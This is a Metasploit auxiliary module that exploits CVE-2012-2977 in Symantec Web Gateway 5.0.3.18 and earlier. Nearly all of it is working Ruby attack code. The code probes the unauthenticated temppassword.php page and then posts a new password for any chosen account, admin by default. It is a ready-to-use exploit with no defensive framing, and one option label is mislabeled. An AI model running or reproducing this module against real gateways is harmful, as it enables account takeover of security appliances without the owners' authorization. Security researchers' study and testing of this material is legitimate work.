Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change (Metasploit)



##

# @_Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::HttpClient

    def initialize(info={})
        super(update_info(info,
            'Name'           => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
            'Description'    => %q{
                    This module will change the password for the specified account on a Symantec Web Gatewaye server.
            },
            'License'        => MSF_LICENSE,
            'Version'        => "$Revision: 0 $",
            'Author'         =>
                [
                    'Kc57',
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-2977' ],
                    [ 'OSVDB', '0' ],
                    [ 'BID', '54430' ],
                    [ 'URL', 'http://www.securityfocus.com/bid/54430' ],
                ],
            'DisclosureDate' => "Jul 23 2012" ))

            register_options(
                [
                    Opt::RPORT(80),
                    OptString.new('USER', [ true, 'The password to reset to', 'admin']),
                    OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
                ], self.class)
    end

    def run

        print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
        res = send_request_raw(
        {
            'method'  => 'POST',
            'uri'     => '/spywall/temppassword.php',
        }, 25)

        #check to see if we get HTTP OK
        if (res.code == 200)
            print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
        else
            print_error("Did not get HTTP 200, URL was not found. Exiting!")
            return
        end

        #Check to if the temppassword.php page loads or if we are redirected to the login page
        if (res.body.match(/Please Select a New Password/i))
            print_status("Server is vulnerable!")
        else
            print_error("Target doesn't seem to be vulnerable!")
            return
        end

        print_status("Attempting to exploit password change vulnerability on #{rhost}")
        print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")

        data  = 'target=executive_summary.php'
        data << '&USERNAME=' + datastore['USER']
        data << '&password=' + datastore['PASSWORD']
        data << '&password2=' + datastore['PASSWORD']
        data << '&Save=Save'

        res = send_request_cgi(
        {
            'method'  => 'POST',
            'uri'     => '/spywall/temppassword.php',
            'data'    => data,
        }, 25)

        if res.code == 200
            if (res.body.match(/Thank you/i))
                print_status("Password reset was successful!\n")
            else
                print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
            end
        else
            print_error("Password reset failed!")
        end
    end

end